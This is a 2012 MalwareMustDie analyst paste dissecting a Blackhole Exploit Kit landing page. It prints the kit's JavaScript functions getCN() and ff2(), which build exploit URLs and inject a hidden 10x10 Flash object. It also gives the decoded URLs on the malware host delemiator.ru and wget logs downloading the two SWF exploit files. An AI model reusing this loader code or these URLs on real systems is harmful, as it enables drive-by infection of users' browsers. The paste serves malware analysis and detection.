MalwareMustDie

#MalwareMustDie FLUSH3 - PluginDetect 0.7.9. Nov 25, 2012

Nov 25th, 2012
  1. =======================================
  2. GET THE SWF EXPLOITER & INFECTOR
  3. THERE ARE 2 (TWO) FUNCTIONS RELATED...
  4. #MalwareMustDie | @unixfreaxjp ~]$ date
  5. Sun Nov 25 20:50:32 JST 2012
  6. =======================================
  7.  
  8. // There are also two SWF downloader functions:
  9.  
  /**
   * Analyst note: returns the relative URL of the first SWF exploit stage.
   * Two query values come from x(), a helper that is part of the kit but is
   * not reproduced in this paste; comparing this string with the decoded URL
   * further down gives x("c833f") = "30:1n:1i:1i:33" and
   * x("cvwyb") = "30:3j:3k:3m:2w". The remaining parameters are fixed text.
   * The host and port (delemiator.ru:8080 in the download below) are not part
   * of the returned string; presumably the caller resolves it against the
   * landing page — the caller is not shown here.
   */
  10.  function getCN()
  11.  {
  12.    return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
  13.  }
  14.  
  15. // Decoding the URL built by this function with the method above gives the download below of the SWF exploit file:
  16.  
  17. http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
  18.  
  19. // download:
  20.  
  21. --17:24:41--  http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
  22.            => `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe'
  23. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
  24. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
  25. HTTP request sent, awaiting response... 200 OK
  26. Length: 5,969 (5.8K) [text/html]
  27. 17:24:43 (128.15 MB/s) - `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe' saved [5969/5969]
  28.  
  29.  
  30. // Here is another one, ff2(), which leads to a second download URL; see the decoding process below.
  31.  
  /**
   * Analyst note: loads the second SWF stage by injecting a small Flash
   * object into the current document.
   *  - url is built the same way as in getCN(): x("c833f") decodes to
   *    "30:1n:1i:1i:33" and x("yxjk") to "3m:3l:37:38" (see the decoded URL
   *    below); the rest of the query string is fixed text.
   *  - The injected markup is a 10x10 <object>/<embed> pair (the classid is
   *    the Flash Player ActiveX control) that loads url as the movie with
   *    allowScriptAccess='always', i.e. the SWF is allowed to call back into
   *    the page's JavaScript. The 10x10 size keeps it visually inconspicuous.
   *  - document.body.appendChild(oSpan) is what actually triggers the load.
   * As pasted, the innerHTML string literal is split across several lines,
   * which is not valid JavaScript; presumably the original was a single line
   * (or was re-wrapped for readability) — the lines are kept here as found.
   * Detection: an <object> with this classid, allowScriptAccess='always' and a
   * movie URL pointing at a .php resource is a useful hunting pattern for this
   * kit's landing pages.
   */
  32. function ff2()
  33.  {
  34.    var oSpan=document.createElement("span");
  35.    var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
  36.    oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
  37.   <param name='movie' value='"+url+"' />
  38.   <param name='allowScriptAccess' value='always' />
  39.   <param name='Play' value='0' />
  40.   <embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
  41.   </embed></object>";
  42.    document.body.appendChild(oSpan);
  43.  }
  44.  
  45. // Focus on this line: var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
  46. // with "yxjk" decoding to "3m:3l:37:38", we get the download URL below, which fetches the second SWF:
  47.  
  48. http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
  49.  
  50. --17:35:50--  http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
  51.            => `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo'
  52. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
  53. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
  54. HTTP request sent, awaiting response... 200 OK
  55. Length: 3,043 (3.0K) [text/html]
  56. 17:35:52 (87.29 MB/s) - `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo' saved [3043/3043]
  57.  
  58. // Further digging into this BHEK2 infector shows that these two SWF infectors also exist at static paths,
  59. // as the download PoC below shows (note the sizes, 3,043 and 5,969 bytes, match the two column.php responses above):
  60.  
  61. --17:39:41--  http://delemiator.ru:8080/forum/data/field.swf
  62.            => `field.swf'
  63. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
  64. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
  65. HTTP request sent, awaiting response... 200 OK
  66. Length: 3,043 (3.0K) [application/x-shockwave-flash]
  67. 17:39:44 (89.55 MB/s) - `field.swf' saved [3043/3043]
  68.  
  69.  
  70. --17:39:54--  http://delemiator.ru:8080/forum/data/score.swf
  71.            => `score.swf'
  72. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
  73. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
  74. HTTP request sent, awaiting response... 200 OK
  75. Length: 5,969 (5.8K) [application/x-shockwave-flash]
  76. 17:39:56 (42.54 MB/s) - `score.swf' saved [5969/5969]
  77.  
  78. #MalwareMustDie!